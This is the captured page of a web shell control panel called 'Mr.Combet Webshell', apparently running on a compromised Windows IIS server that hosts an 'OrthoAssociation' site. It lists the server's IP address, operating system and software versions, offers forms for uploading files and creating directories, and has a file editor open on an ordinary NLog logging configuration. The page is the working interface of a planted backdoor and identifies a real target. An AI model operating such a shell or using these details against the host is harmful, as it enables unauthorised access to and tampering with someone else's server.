Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
OrthoAssociation
/
Edit File Name :
NLog.config
<?xml version="1.0" encoding="utf-8" ?> <nlog xmlns="http://www.nlog-project.org/schemas/NLog.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" autoReload="true" internalLogLevel="Info" internalLogFile="internal-nlog.txt"> <targets> <!-- Log to file --> <target name="logfile" xsi:type="File" fileName="logs/error-${shortdate}.log" layout="${longdate}|${level:uppercase=true}|${logger}|${message} ${exception:format=ToString}" archiveFileName="logs/archive/error-${shortdate}-{##}.log" archiveEvery="Day" archiveNumbering="Rolling" maxArchiveFiles="30" concurrentWrites="true" keepFileOpen="false" /> <!-- Log to console (optional) --> <target name="console" xsi:type="Console" layout="${longdate}|${level:uppercase=true}|${logger}|${message} ${exception:format=ToString}" /> </targets> <rules> <!-- Log all errors to file --> <logger name="*" minlevel="Error" writeTo="logfile" /> <!-- Log all messages to console (optional) --> <logger name="*" minlevel="Trace" writeTo="console" /> </rules> </nlog>
Save